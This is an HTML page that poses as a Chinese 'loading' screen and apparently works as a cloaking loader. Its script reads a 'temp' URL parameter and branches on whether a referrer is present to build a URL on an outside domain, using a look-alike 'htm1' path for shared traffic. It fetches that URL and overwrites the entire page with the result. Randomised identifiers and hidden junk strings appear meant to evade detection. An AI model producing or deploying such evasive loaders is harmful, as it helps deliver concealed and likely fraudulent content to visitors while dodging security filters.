<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .NI2LNqD6I {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .NI2LNqD6I .zcR8Ym {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .NI2LNqD6I .content {
            line-height: 50px;
            text-align: center
        }

        .NI2LNqD6I .img {
            width: 100%
        }

        .NI2LNqD6I .t14ZXS {
            text-align: center
        }

        .NI2LNqD6I .t14ZXS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .NI2LNqD6I .t14ZXS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .NI2LNqD6I .t14ZXS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .NI2LNqD6I .t14ZXS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .NI2LNqD6I .t14ZXS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .NI2LNqD6I .t14ZXS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .NI2LNqD6I .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function PIIH84yjMRi(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iHtJG = PIIH84yjMRi('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iHtJG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iHtJG +".html?a=share";
		}
		
        N0saalDTqL=url+"#"+new Date().getTime();
        N0saalDTqL && function() {
            $.get(N0saalDTqL, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >Pr7c4c9foBtMaoCpFEeK3BxZ7elnKDpGhc</h1>
<span style='display:none'>wqBqlxaBIm1NQk54eagw3wxlqyHXqUYRd9cZGtUZr0dGauuBUsIfUNsgkyx8xre3omSiS6AgITP</span>
<span style='display:none'>wqBqlxaBIm1NQk54eagw3wxlqyHXqUYRd9cZGtUZr0dGauuBUsIfUNsgkyx8xre3omSiS6AgITP</span>
<b style='display:none' >s2zAzkEFhRylusVPQsF5jFI6u5C11rR8FRVWnWFXMNu1jhBROkwSeZyb3mffAM4WGn2x8eu</b>
<img  src='' style='display:none'>
<li style='display:none' >Hw158Zu0hDCrObfyagoIKyoiPWK</li><div class="NI2LNqD6I">
    <div class="zcR8Ym">
        <div class="t14ZXS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >NpkVnaVXvTO75UFQtof5PD0X5EQGzagbkjq9c6MymVgryMkUwjgdgfk5KGKeXblieShAuyr50202SV2x8BeyQkzIvbhHH</b>
<h1 style='display:none' >Xnu6v1COG77kCB7qTGHep3t6lURMiVLP2Am5SJbFG2sh5EJuMFGkGnzTxNBu5itCtMhUEwetdawKy3gWDGVZBhpL38Ypg8uN0</h1>
<img  src='' style='display:none'></body>
</html>